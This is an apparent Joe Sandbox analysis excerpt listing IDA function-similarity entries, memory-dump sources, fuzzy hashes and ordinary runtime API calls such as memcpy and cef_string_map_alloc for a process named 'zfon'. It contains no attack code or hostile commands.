                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturncef_string_map_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2776152272-0
                                                                                                                                                                            • Opcode ID: 1e3490bca68b8c3274cbeecc2115020831b9076bd9e81532a15e2d3a86fb5802
                                                                                                                                                                            • Instruction ID: 2ff26b3fe0754207093fbc7e59502c36dfc04c138c09139465881f05b1234cfb
                                                                                                                                                                            • Opcode Fuzzy Hash: 1e3490bca68b8c3274cbeecc2115020831b9076bd9e81532a15e2d3a86fb5802
                                                                                                                                                                            • Instruction Fuzzy Hash: DF616E63B04A8284FF24EBB5D4403BCA7B2AB40B98F998535DE5D57B99CF38D941C320
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25C3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25D3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25E3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25F0
                                                                                                                                                                            • new.LIBCMT ref: 00007FF79CFB923F
                                                                                                                                                                              • Part of subcall function 00007FF79D073D44: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF79D073D70
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFB9266
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFB9302
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFB9336
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFB9364
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturncef_string_map_alloc$malloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1577610649-0
                                                                                                                                                                            • Opcode ID: 6ace9081bd1f1edd449fb6e0773b42b66ffd3d33c4d8c5aa578f97e1b911971e
                                                                                                                                                                            • Instruction ID: b0ae4c4cc327b25e1d310ae0004c36f574efa4ef52e00ecc4b549d42ebec076d
                                                                                                                                                                            • Opcode Fuzzy Hash: 6ace9081bd1f1edd449fb6e0773b42b66ffd3d33c4d8c5aa578f97e1b911971e
                                                                                                                                                                            • Instruction Fuzzy Hash: 0C519223B05A4284FF20ABB1D8402BC77B6BB44BA8F998135DE5D17B95CF38D945C310
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: freememcpy$mallocmemmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4020268379-0
                                                                                                                                                                            • Opcode ID: 0a302a5f15a6ffb896fe3f1ed937148e5395896a0c9eb31bcb25d4cdad06a287
                                                                                                                                                                            • Instruction ID: 62c93bf296ea292deedfd030c38aac515f3918f3c10872fe1bf436f3e3e91b9c
                                                                                                                                                                            • Opcode Fuzzy Hash: 0a302a5f15a6ffb896fe3f1ed937148e5395896a0c9eb31bcb25d4cdad06a287
                                                                                                                                                                            • Instruction Fuzzy Hash: 5241C223619B8281EE20AB21E94037AA7B1FB85BE0F545235FEAE07BD5DF3CD0408710
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: freememcpy$mallocmemmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4020268379-0
                                                                                                                                                                            • Opcode ID: 12b8396c82e345bc1688e98f6ccbff207033e9e2852a0f582d1375f5ce158e35
                                                                                                                                                                            • Instruction ID: ae50ebd3ea96588cb08d2e9a97468a7232e4b51325c4cba959fc53622764a254
                                                                                                                                                                            • Opcode Fuzzy Hash: 12b8396c82e345bc1688e98f6ccbff207033e9e2852a0f582d1375f5ce158e35
                                                                                                                                                                            • Instruction Fuzzy Hash: 0541C223719B8281EE20AB22E94436EA761FB85BE0F541235EEAE07B95DF3DD440C710
                                                                                                                                                                            APIs
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,?,00007FFBC1B42A30,?,?,00000000,00007FFBC1B45826), ref: 00007FFBC1B425A5
                                                                                                                                                                            • memset.VCRUNTIME140(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,?,00007FFBC1B42A30,?,?,00000000,00007FFBC1B45826), ref: 00007FFBC1B425B3
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,?,00007FFBC1B42A30,?,?,00000000,00007FFBC1B45826), ref: 00007FFBC1B425EC
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,?,00007FFBC1B42A30,?,?,00000000,00007FFBC1B45826), ref: 00007FFBC1B425F6
                                                                                                                                                                            • memset.VCRUNTIME140(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,?,00007FFBC1B42A30,?,?,00000000,00007FFBC1B45826), ref: 00007FFBC1B42604
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: memcpymemset$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 530858481-0
                                                                                                                                                                            • Opcode ID: 8df3b8b3b55c4ad0e2b75d810ff762bfc816abf5dc778e1cac203e07009b2fb8
                                                                                                                                                                            • Instruction ID: 8427bb9ed3431097c4d5d97771bfcdd0c855157e12b434b4b65700b73f705b2a
                                                                                                                                                                            • Opcode Fuzzy Hash: 8df3b8b3b55c4ad0e2b75d810ff762bfc816abf5dc778e1cac203e07009b2fb8
                                                                                                                                                                            • Instruction Fuzzy Hash: 7341F3A6B08B8191EF14EF32F50426A6351BB04BE0F489631DE6E2B7D6CE7CE041D750
                                                                                                                                                                            APIs
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,00000000,?,?,00000001,00000000,00000000,00000000,?,00007FFBC1B4C333), ref: 00007FFBC1B4C617
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,00000000,?,?,00000001,00000000,00000000,00000000,?,00007FFBC1B4C333), ref: 00007FFBC1B4C648
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000000,?,?,00000001,00000000,00000000,00000000,?,00007FFBC1B4C333), ref: 00007FFBC1B4C680
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,00000000,?,?,00000001,00000000,00000000,00000000,?,00007FFBC1B4C333), ref: 00007FFBC1B4C68A
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,00000000,?,?,00000001,00000000,00000000,00000000,?,00007FFBC1B4C333), ref: 00007FFBC1B4C6BB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: memcpy$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2665656946-0
                                                                                                                                                                            • Opcode ID: c5414dc02fb282a514dd476fa31f041e2728c0031ac456c67ca1122fc35b3a76
                                                                                                                                                                            • Instruction ID: 9bd62a3b3c7c7cf1cbd458fea9d9325eeed31b51785aa22a444bdfc30a63282f
                                                                                                                                                                            • Opcode Fuzzy Hash: c5414dc02fb282a514dd476fa31f041e2728c0031ac456c67ca1122fc35b3a76
                                                                                                                                                                            • Instruction Fuzzy Hash: 2441F5A6704A4191EF04EF26E4041AA2351FB44FD4F949132EE5D27BA9DE7CE041C750
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: memcpy$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2665656946-0
                                                                                                                                                                            • Opcode ID: 46b82a7cf3177d4084a802e0d1aaf4a65ae280c1fa6c272f9c3f0bbded35a758
                                                                                                                                                                            • Instruction ID: c1c26ae6496ecab2bd2b36e9fca661d0468e7a799f12a49d7ce90ddf7fe312f7
                                                                                                                                                                            • Opcode Fuzzy Hash: 46b82a7cf3177d4084a802e0d1aaf4a65ae280c1fa6c272f9c3f0bbded35a758
                                                                                                                                                                            • Instruction Fuzzy Hash: 393102AA708A4192EF00AF22E9041AB6351FB48FD0F585532EF5E6BB96CE7CE051C744
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: NameName::$Name::operator+
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 826178784-0
                                                                                                                                                                            • Opcode ID: f8c65f689e74ec1d19f277c4e47f913f6a8a81dfac6f18ea7d1e3c5bf52b630d
                                                                                                                                                                            • Instruction ID: b376c60008ec223a80b93e38e36cb2f82069e855514cbe2820c23dc50a97e694
                                                                                                                                                                            • Opcode Fuzzy Hash: f8c65f689e74ec1d19f277c4e47f913f6a8a81dfac6f18ea7d1e3c5bf52b630d
                                                                                                                                                                            • Instruction Fuzzy Hash: E34184ABA1868698E710CF31D8902BE37A5BF157C0B666032DA4D73795DF38E555CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc$memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3154343008-0
                                                                                                                                                                            • Opcode ID: c7be93b47b78dac1e6dca633dd4509a2773a55bac6c05f665f9044a2a3758c04
                                                                                                                                                                            • Instruction ID: 13c7f7e616cf4c54aabc7efbefe90643d1374bd588f739bead10ba686f7dd27e
                                                                                                                                                                            • Opcode Fuzzy Hash: c7be93b47b78dac1e6dca633dd4509a2773a55bac6c05f665f9044a2a3758c04
                                                                                                                                                                            • Instruction Fuzzy Hash: 1A416D73618A8691EF60DF29E8507A9F761FB88B88F885031EB8E47A54DF3CD545C710
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$cef_string_map_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3856544966-0
                                                                                                                                                                            • Opcode ID: 8e17ec145e53769a2c641425164b26e1b6e40d98fb995a57eac84be446339539
                                                                                                                                                                            • Instruction ID: f9c2484d45328d10bf31d9b7ebfcbf8017330e064a7523e94ee6dd819a034305
                                                                                                                                                                            • Opcode Fuzzy Hash: 8e17ec145e53769a2c641425164b26e1b6e40d98fb995a57eac84be446339539
                                                                                                                                                                            • Instruction Fuzzy Hash: CC318D32A0CB8691EB24EB65E558369B372FB84B90F800135D69D47B99CF7CD484C760
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc$memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3154343008-0
                                                                                                                                                                            • Opcode ID: bce620b4b582b47963069ae1a1b446d6e6f47537035ff154e18360a55b9e623c
                                                                                                                                                                            • Instruction ID: 5b2a3ac21d0aa1fee01425c4077318b5515e563c2b37048067b3cc3137d685fa
                                                                                                                                                                            • Opcode Fuzzy Hash: bce620b4b582b47963069ae1a1b446d6e6f47537035ff154e18360a55b9e623c
                                                                                                                                                                            • Instruction Fuzzy Hash: CE314172718A8281EF64DF25E9507A9E371FF94B89F849031DA8E47668DF3CD445C710
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc$memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3154343008-0
                                                                                                                                                                            • Opcode ID: 225472a601b65b387531f845988a81aac3dd013bdd7c23c631c239d08109b78f
                                                                                                                                                                            • Instruction ID: 34dcf9e86ca22a485989d6b0320bed4448168cfa8ec4f4e2ba5e241d7c6eeac0
                                                                                                                                                                            • Opcode Fuzzy Hash: 225472a601b65b387531f845988a81aac3dd013bdd7c23c631c239d08109b78f
                                                                                                                                                                            • Instruction Fuzzy Hash: 98314E72618A8281EF64DB25E9503B9E772FF94B88F849031DA8E476A8DF3CD445C710
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
